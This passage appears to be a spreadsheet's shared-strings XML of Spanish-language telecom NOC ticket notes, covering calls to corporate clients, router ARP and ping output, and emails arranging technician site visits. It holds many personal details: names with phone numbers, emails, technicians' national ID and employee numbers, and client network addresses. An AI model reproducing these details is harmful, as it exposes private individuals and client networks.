    <t>SE LLAMA A CLIENTE SRTA. INGRID HERNANDEZ 30950377 SE LE RECOMIENDA ESCALAR CON SU ENCARGADO DE IT PARA QUE REVISEN SUS EQUIPOS WLAN YA QUE CLAVO NO LE PROPORCIONA WI-FI CORPORATIVO CON CISCO MERAKI, SU RED INTERNA TIENE EQUIPOS TP-LINK DEL CLIENTE PARA PROPORCIONAR WI-FI, CLIENTE QUEDA ENTERADA, SE PROCEDE AL CIERRE DEL INCIDENTE.
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.87.20.1              0   DC99.147A.A579  ARPA   GIGABITETHERNET1
INTERNET  10.87.20.27            37   00FD.2227.68D1  ARPA   GIGABITETHERNET1
INTERNET  10.87.20.28             -   5006.ABE4.C655  ARPA   GIGABITETHERNET1
INTERNET  186.151.205.181         -   5006.ABE4.C650  ARPA   VLAN1
INTERNET  186.151.205.182         -   5006.ABE4.C650  ARPA   VLAN1
INTERNET  192.168.1.1             -   5006.ABE4.C650  ARPA   VLAN1
INTERNET  192.168.1.3             0   C81F.6609.FED1  ARPA   VLAN1
INTERNET  192.168.1.4             1   C81F.6609.FECE  ARPA   VLAN1
INTERNET  192.168.1.5             0   66D1.2054.0D51  ARPA   VLAN1
INTERNET  192.168.1.6           170   E617.435F.D1FF  ARPA   VLAN1
INTERNET  192.168.1.9             0   1477.4001.496B  ARPA   VLAN1
INTERNET  192.168.1.10           90   D037.459D.8020  ARPA   VLAN1
INTERNET  192.168.1.12           88   BA11.FBCE.E4FE  ARPA   VLAN1
INTERNET  192.168.1.13            0   D037.459B.4951  ARPA   VLAN1
INTERNET  192.168.1.30           24   D46A.6A4E.9AD3  ARPA   VLAN1
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#
A NIVEL DE CLARO TODO OK:
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#PING 8.8.8.8 SOU
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#PING 8.8.8.8 SOURCE VKL
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#PING 8.8.8.8 SOURCE VL 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 186.151.205.181
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 24/26/28 MS
CC_VIVERO_BOTANIK_GT_INTERNET_KM14_SANTACATARINAPINULA#</t>
  </si>
  <si>
    <t>NO SE VALIDA ALGO PENDIENTE POR PARTE DEL CLIENTE Y REPORTA INCIDENCIA POR LO QUE SE MUEVE A WIP Y SE LE NOTIFICA AL GESTOR MIGUELAN.RODRIGUEZ VIA SKYPE EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4575914</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO MALDONADO 54249393 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001998679 - 1001999142</t>
  </si>
  <si>
    <t>F4575924</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 15:35
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; L.GOMEZMONTANO@DXC.COM &lt;L.GOMEZMONTANO@DXC.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: F4575924 || COCA COLA FEMSA DE COSTA RICA S.A || CONTR0001286888OC
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4575930</t>
  </si>
  <si>
    <t>SE HABLÓ CON WILLIAM ESCOBAR/CLIENTE 58223754 INDICA QUE REALIZARÁ SUS PRUEBAS INTERNAS, PIDE SE MANTENGA SERVICIO EN MONITOREO PARA LAS 17:00 HORAS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM ESCOBAR 58223754 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001999480</t>
  </si>
  <si>
    <t>F4575934</t>
  </si>
  <si>
    <t>SE  LLAMA AL SEÑOR NELSON ESPAÑAN AL 50515497 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001936613 - 1001936766
**</t>
  </si>
  <si>
    <t>**SE LLLAMA A CLIENTE MARVIN AJUCHAN AL 48370952 SOLICITA QUE SE LE LLAME AL SEÑOR NELSON ESPAÑAN AL 50515497 YA QUE EL NO ESTA EN SITIO **
ID 1001935196
**</t>
  </si>
  <si>
    <t>F4575952</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON TÉCNICO ASIGNADO; ADICIONAL SE LLAMÓ/HABLÓ CON JAIME LAI/CLIENTE 58000111 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4575964</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE SOLICITANDO ACCESOS
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: MARTES, 24 DE MAYO DE 2022 17:42PARA: AG443@BANRURAL.COM.GT &lt;AG443@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;; TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;ASUNTO: 8901358T || AG443 || BANRURAL || ENLACE REDUNDANTE
BUENAS TARDES, ESTIMADO CLIENTE.
DANDO SEGUIMIENTO AL CASO REPORTADO POR MONITOREO PROACTIVO, EN NECESARIO REALIZAR UNA VISITA TÉCNICA PARA LA REVISIÓN DEL MISMO, SE ADJUNTA INFORMACIÓN DE TÉCNICOS QUE HAN SIDO ASIGNADOS A LA REVISIÓN Y REPARACIÓN DEL ENLACE. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
CARLOS GUILLERMO GARCIA FUENTES    1918 37377 1107 5826 1939 580015
ALVARO JOSE CHAMALE FIGUEROA          2413 65147 0114 5826 4656 532978
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4575971</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JASMIN GARRIDO AL 33121789 SE LLAMA A CLIENTE NO RESPONDE, SE INTENTARA LUEGO **
ID 1001938463
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JASMIN GARRIDO 33121789 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001999175
**</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
INGRESA EL IVR. SE CONSULTA POR EL CLIENTE JASMIN GARRIDO, PERO INDICAN QUE NO SE ENCUENTRA.
SE HABLO CON MARTA.
1001999923
COLA:
NOMBRE: A: 79644200
NÚMERO: 79644200
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 79644200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/05/2022 17:06:02</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y SE HABLO CON EL CLIENTE MARTA QUIEN AUTORIZA EL CIERRE.
2001002248
COLA:
NOMBRE: A: 79644200
NÚMERO: 79644200
DURACIÓN: 0:00:26
ESTADO: CONECTADA
DETALLES: 79644200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/05/2022 17:14:42</t>
  </si>
  <si>
    <t>SE PROCEDE A CONTACTAR CON CLIENTE JASMIN GARRIDO 33121789 QUIEN INDICA QUE EL SERVICIO ESTUVO INTERMITENTE EN LA MAÑANA PERO QUE AHORA YA ESTA NORMALIZADO, INDICA QUE SE VALIDE A LAS 17:00 HRS EL ESTADO DEL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JASMIN GARRIDO AL 33121789 INDICA QUE SE LE DEVUELVA LLAMADA QUE REALIZARA PRUEBAS**
ID 1001934469
**</t>
  </si>
  <si>
    <t>F4575979</t>
  </si>
  <si>
    <t>SE LLLAMA A CLIENTE SAMUEL MAXIMILIANO LOPEZ 23178400 EXT. 8407 MENCIONA QUE YA APLICARON REINICIO PERO EL MEDIA CONVERTER NO DA LINK DE FIBRA
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001971904
NOMBRE DEL CLIENTE: BANCO FICOHSA S.A.
UBICACIÓN: 23 C. 20-24 Z.7 VILLA HERMOSA 1 CC PACIFIC CENTER (INT. SUPERMERCADO LA TORRE)
CONTACTO EN SITIO: ENCARGADO DE TURNO PERO LLAMAR A SAMUEL MAXIMILIANO 23178400 EXT. 8407
HORARIO DE ATENCION:HASTA LAS 19 HRS
GESTIÓN DE PERMISOS:SI FUESE NECESARIO VALIDAR EL CABLEADO DE CC
LOS DATOS DE PERSONAL TECNICO -- SAMUEL.LOPEZ@FICOHSA.COM --</t>
  </si>
  <si>
    <t>F4575983</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS || PENDIENTE RESPUESTA
ERITO FERNANDO TECU XITUMUL
ASUNTO: RE: APERTURA TICKET ENLACE ID 392100080 BANCO FICOHSA
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO 392100043T || BANCO FICOHSA S.A.|| LOTE 7 MZ.A S B-6 COL. SAN CRISTOBAL ZONA 8 MIXCO.
LE COMENTO QUE SE ESTÁ COORDINANDO UNA VISITA TÉCNICA AL SITIO POR LO CUAL SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR ACCESOS CORRESPONDIENTES PARA NUESTRO PERSONAL TÉCNICO.¿
ADJUNTO LOS DATOS DEL POSIBLE PERSONAL ASIGNADO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAMUEL MAXIMILIANO  23178400 EXT. 8407 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 2001047745
**</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A CLIENTE SOLICITANDO VALIDAR SERVICIO ||
ERITO FERNANDO TECU XITUMUL
ASUNTO: RE: APERTURA TICKET ENLACE ID 392100043 BANCO FICOHSA
BUENA TARDE ESTIMADOS BANCO FICOHSA.
EN SEGUIMIENTO AL SERVICIO REPORTADO ID: 392100043T || BANCO FICOHSA S.A. || UBICADO EN LOTE 7 MZ.A S B-6 COL. SAN CRISTOBAL ZONA 8 MIXCO.
LE COMENTO QUE NUESTRO PERSONAL TÉCNICO FINALIZA LA VISITA EN LA CUAL ENCONTRARON UN PATCHCORD DE FIBRA ÓPTICA DAÑADO, ACTUALMENTE YA OBSERVAMOS EL SERVICIO OPERATIVO Y ESTABLE, SOLICITAMOS NOS APOYEN VALIDANDO SERVICIO.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>COMPAÑEROS DE DESPACHO, CLIENTE AUTORIZA ACCESOS
SAMUEL MAXIMILIANO LOPEZ GOMEZ &lt;SAMUEL.LOPEZ@FICOHSA.COM&gt;
BUENAS TARDES,
LOS PERMISOS FUERON COORDINADOS, POR INFORMAR CUANDO EL PERSONAL ESTÉ EN SITIO. ATIENDEN HASTA LAS 19 HRS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4575989</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR ESTRADA 53663222  MENCIONA QUE PERSISTE EL INCONVENIENTE SE LE MENCIONA QUE A NIVEL DE CLARO EL SERVICIO SE ENCUENTRA OPERATIVO Y ESTABLE
CLIENTE SOLICITA SE PUEDA COMPARTIR EL DIAGNOSTICO POR CORREO OBARRERA@ACCESOFINANCIERO.COM.GT
-ID 1001992545</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  OSCAR ESTRADA 53663222 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001072164
**</t>
  </si>
  <si>
    <t>SE VALIDA EL SEGUIMIENTO DE LA CRONOLOGÍA POR LO QUE NO APLICA PC Y NO HAY SEGUIMIENTO SE NOTIFICA AL GESTOR ALEJANDRO.NAVARRO VÍA SKYPE PARA EL SEGUIMIENTO</t>
  </si>
  <si>
    <t>F4575992</t>
  </si>
  <si>
    <t>SE LLAM A CLIENTE SR. SERGIO BALTODANO 89884602 NO SE LOGRO COMUNICACION CON CENTRAL, ESTIMADOS VALIDAR MEDIANTE SD, EN PUNTO REMOTO NO HAY ENERGIA ELECTRICA, POSIBLEMENTE HASTA MAÑANA, ID: 1001936496.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. ROSA NARVAEZ  85748452 INFORMA QUE NO HA ENERGIA ELECTRICA EN PUNTO REMOTO, ESTIMA QUE REGRESE HASTA MAÑANA, ID: 1001935653.</t>
  </si>
  <si>
    <t>F4575994</t>
  </si>
  <si>
    <t>SE LAMA AL CLIENTE JUANITA MERINO 72534276 SE LE PIDE APOYO PARA UBICAR EL MODEM DE CLARO, CLIENTE SOLICITA SE LE LLAME A NAPOLEON SERRANO YA QUE ELLA NO CONOCE DE EQUIPOS. 1001964238</t>
  </si>
  <si>
    <t>CLIENTE JOSE SERRANO 76977718 REALIZA PRUEBAS Y VALIDA QUE YA TIENEN LLAMADAS ENTRANTES Y SALIENTES, AUTORIZA EL CIERRE DEL CASO. ID: 2001151647</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE NAPOLEON SERRANO 76977718, SOLICITA SE LE LLAME MAÑANA A LAS 8 AM YA QUE YA NO HAY NADIE EN LAS INSTALACIONES. 1001986138</t>
  </si>
  <si>
    <t>F4575996</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOCELYN ALVAREZ 22407528 CONTESTA EL SEÑOR JACOB INDICA QUE AUN PERSISTE
EL INCONVENIENTE || SE NOTIFICA A GESTOR **
ID 1001991604
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22407528 CONTESTA SR. KELVIN MARTINEZ , ACTUALMENTE INDICA QUE NO LE LLEGA A LA IP 172.19.1.54, SE RUTEA Y SE ENCUENTRA EN ENLACE CORRECTO, INFORMA QUE AYER LLEGO UN TECNICO DE CLARO Y RECONECTO EL PATCHCORD EN OTRO PUERTO Y EL ENLACE LEVANTO, SE PROCEDE A CONSULTAR QUIEN LLEGO AL SITIO YA QUE ESTA CONEXION CAE Y LEVANTA SE NECESITA CONSULTAR SI ESE PATCHCORD ESTA DAÑADO O LAS INTERFACES DEL ROUTER.</t>
  </si>
  <si>
    <t>F4576002</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARVIN RIVERA
QUIEN ESTA UBICANDO EL ASMI.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARVIN RIVERA 76040394 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001141132</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARVIN RIVERA 76040394 QUIEN REALIZA PRUEBAS Y MENCIONA QUE YA TODO ESTA FUNCIONANDO BIEN  PERO SOLICITA LLAMADA PARA MAÑANA A LAS 12 HRS
-ID 1001990980</t>
  </si>
  <si>
    <t>F4576023</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE NERY JULIAN QUIEN VALIDA EL E1 ACTIVO, INDICA QUE REINICIARON EQUIPOS Y EL SERVICIO RESTABLECIÓ. AUTORIZA EL CIERRE DEL CASO. ID:1001950076</t>
  </si>
  <si>
    <t>F4576026</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARGARITA  MOLINA 22026000 MENCIONA QUE NO ESTAN LLEGANDO AL ANCHO DE BANDA CONTRATADO, CLIENTE ESTA SOLICITANDO UNA CERTIFICACION DEL SERVICIO
-ID 1001985756 - 1001986075 - 1001989405
NOMBRE DEL CLIENTE: INDUSTRIAS GRAFICAS DIAZ ALBIZUREZ, S.A.
UBICACIÓN:2 CALLE 35-70 ZONA 11 COLONIA TOLEDO
CONTACTO EN SITIO: MARGARITA  MOLINA - 22026000
HORARIO DE ATENCION: SOLICITA VISITA PARA MAÑANA A LAS 9:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>EN SEGUIMIENTO A CRONOLOGÍA DE LA FALLA , NO APLICA PC SE NOTIFICA AL GESTOR ALEJANDRO.NAVARRO VÍA SKYPE EL CAMBIO Y SE LE SOLICITA EL APOYO PARA EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4576038</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARVIN OCHOA 4721306 MENCIONA QUE NECESITA LOS DATOS DE PERSONAL TECNICO POR CORREO
-ID 2001001561</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JHONNY ALFARO AL 54829633 INDICA QUE YA SE PUEDE PRESENTAR EL PERSONAL TECNICO QUE YA ESTAN LOS PERMISOS AUTORIZADOS **
ID 2001042737
**</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREOS AUN NO SE TIENE RESPUESTA DEL CLIENTE
SOLICITUD DE PERMISOS || SERVICIOS Y TERMINALES, S.A. || 844200002T || SD1128733</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 18:04
PARA: PTQ.MOCHOA@SYTDEPTO.CC &lt;PTQ.MOCHOA@SYTDEPTO.CC&gt;; PTQ.MOCHOA@FYT.DEPOT.CC &lt;PTQ.MOCHOA@FYT.DEPOT.CC&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS || SERVICIOS Y TERMINALES, S.A. || 844200002T || SD1128733
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 17:30
PARA: PTQ.MOCHOA@SYTDEPTO.CC &lt;PTQ.MOCHOA@SYTDEPTO.CC&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS || SERVICIOS Y TERMINALES, S.A. || 844200002T || SD1128733
BUENA TARDE
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
NOMBRE               IBM                DPI
AXEL ZARPEC      796395       1624525270501
ADJUNTO INFORMACIÓN DE QUIENES HAN SIDO ASIGNADOS A LA REVISIÓN Y RESOLUCIÓN DE FALLA, EL DÍA DE MAÑANA MIÉRCOLES 24 AL MISMO TIEMPO INFORMAR A ENCARGADOS DE BRINDAR ACCESO PARA AGILIZAR LOS PROCESOS, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4576040</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON CONSULTORÍA CLARO MAÑANA A LAS 08:00AM A SOLICITUD DE CLIENTE</t>
  </si>
  <si>
    <t>SE CONVERSO   CON CLIENTE JOSUE CANIZ, INDICA QUE ESTARA ENVIANDO LA INVITACION PARA MEET VIA TEAMS, POR LO QUE SE QUEDA A ESPERA DE CORREO.
2001047248
COLA:
NOMBRE: A: 41673388
NÚMERO: 41673388
DURACIÓN: 0:01:10
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 41673388
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 25/05/2022 08:14:17</t>
  </si>
  <si>
    <t>SE LLAMA AL PR JOSUÉ CANÍZ AL 41673388 ID 2001214361 ATIENDE Y SE LE BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE YA LO VEN OPERATIVO NO ES NECESARIO MAYOR INTERVENCIÓN Y CONFIRMA EL CIERRE DE LA FALLA PROCEDER CON EL CIERRE DEL TICKET CON LA SD SE NOTIFICA AL GESTOR LUVY.SANDOVAL VIA SKYPE.</t>
  </si>
  <si>
    <t>F4576042</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6042
ID: 625900244T
IDENTIFICADOR DEL CLIENTE: CC_CAMPERO_GT_C682
UBICADO EN:  682, 5ª CALLE 9-55 ZONA 2 CANTÓN MORAZÁN CENTRO COMERCIAL LA TRINIDAD LOCAL FC-3 MALACATÁN SAN MARCO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4576044</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR PERALTA AL 46153837 NO RESPONDE, ENVIA A BUZON  SE INTENTARA LUEGO **
ID 1001993064
**</t>
  </si>
  <si>
    <t>F4576046</t>
  </si>
  <si>
    <t>SE HA TERMINADO  CONFERENCIA- NO SE TUVO ALGUN AVANCE ## CLIENTE NOS ESTARA INDICADO CUAL ES LA AFECTACION + NOS ENVIARA CORREO ## + NOS INDICARA CUANDO SE REALIZARA OTRA REUNION</t>
  </si>
  <si>
    <t>SE SIGUE EN CONFERENCIA CON CLINETE- HAN CAMBIADO A LA PERSONA DE ORANGE. POR LO QUE SEE ESTA A LA ESPERA DE QUE LA PERSONA QUE ACABA DE INGRESAR SE EMPAPE DE LA SITUACION ##AUN NO SE CONFIRMA EL PROBLEMA##</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE, PARA QUE SEA MAS FACIL LA DETECCION DE LO QUE REPORTAN ## DEBIDO A QUE ES NECESARIO SABER QUE CUAL ES EL REPORTE ##SERVICIO SE OBSERVA ACTIVO, LLAMADAS AL GDN COMPLETAN-- ##
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 9:31
PARA: APMM.DCSC@ORANGE.COM &lt;APMM.DCSC@ORANGE.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; SOFIA JUAREZ REYES &lt;SOFIA.JUAREZ@MAERSK.COM&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473
HELLO TEAM ORANGE, ALEXANDER CARTAGENA,  BEFORE THE MEET NEED THAT USER/S IN GUATEMALA REALIZE TEST IN CALLS AND ANSWER THE QUESTION'S, BECAUSE  WE NEED MORE DETAIL ABOUT THE PROBLEM THAT THEY ARE REPORTING
 -NUMBER DESTINATION
 -NUMBER ORIGEN
 -PROBLEM IS WHEN SHE/HE CALL OR ANSWER?
 -WHAT'S UP WHEN HE/SHE CALL?
 -WHAT'S THE PROCEESS OF CALL?
 -WHAT'S UP NOW WHITH PROCEESS OF CALL ?
 -HE/SHE  TEST OTHER NUMBER ORIGEN (EXTENSION)? THE CALL COMPLETE?
BUEN DIA, ORANGE  Y ALEXANDER CARTAGENA, ES NECESARIO QUE REALICEN PRUEBAS CON SU PERSONAL EN GUATEMALA ANTES DE REALIZAR UNA CONFERENCIA CON NOSOTROS, DEBIDO A QUE  NECESITAMOS MAS INFORMACIÓN SOBRE EL INCONVENIENTE QUE ESTÁN REPORTÁNDONOS, POR LO QUE SUGERIMOS QUE REALICEN VARIAS PRUEBAS CON PERSONAL EN PUNTO REMOTO Y PUEDAN LLENAR ESTE PEQUEÑO FORMATO, PARA FACILIDAD DE RESOLUCIÓN Y DETECCIÓN DE LO QUE REPORTAN.
-NÚMERO ORIGEN
-NÚMERO DESTINO
-EL PROBLEMA ES EN LLAMADA ENTRANTE? SALIENTE?
-QUÉ PASA CUANDO LA PERSONA LLAMA? (TANTO EN LLAMADA ENTRANTE COMO SALIENTE?
-CUAL ES EL PROCESO NORMAL QUE REALIZAN EN LAS LLAMADAS?
-EN ESTE MOMENTO, CUAL ES EL PROCESO QUE REALIZAN DE LLAMADAS? (TENIENDO EL INCONVENIENTE)
-HAN PROBADO CON OTRA EXTENSIÓN?
BEST REGARDS, SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>CLIENTE INSISTE VIA CORREO QUE NECESITA LA REUNION PERO NO EXPLICA EL PROBLEMA A DETALLE- SE HA SOLICITADO LINK PARA REUNIRNOS +
NOTA: SE DEBE SABER QUE REPORTA EL CIENTE ##
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 10:19
PARA: ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; APMM.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
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473
PLEASE SHARE THE LINK FOR MEETING
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;
DE: ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 9:58
PARA: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; APMM.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
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473
GOOD MORNING DEAR,
YESTERDAY @MONICA YIREH CASTILLO POON CONFIRMED THE CONFERENCE, I COORDINATED AND MADE THE TIME FOR THE CONFERENCE TOGETHER WITH YOU. THE ERROR HAS ALREADY BEEN DETAILED, THE ORANGE TEAM HAS ALREADY DONE IT, IT IS IN THE EMAIL QUEUE.
I DON'T UNDERSTAND THE DELAY.
ALEXANDER CARTAGENA
IT SUPPORT TECHNICIAN ¿ GUATEMALA
MAERSK TECHNOLOGY - END-USER SUPPORT &amp; ENABLEMENT
PHONE: +502 3422-4345
EMAIL: ALEXANDER.CARTAGENA@MAERSK.COM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER CARTAGENA- 34224345 NOS INDICA QUE NO NOS PUEDE ATENDER EN ESTE MOMENTO, DEBIDO A QUE ENTRARA A UNA REUNION Y QUE SE LE CONTACTE APROX 30 MINUTOS ##
2001086947
COLA:
NOMBRE: A: 34224345
NÚMERO: 34224345
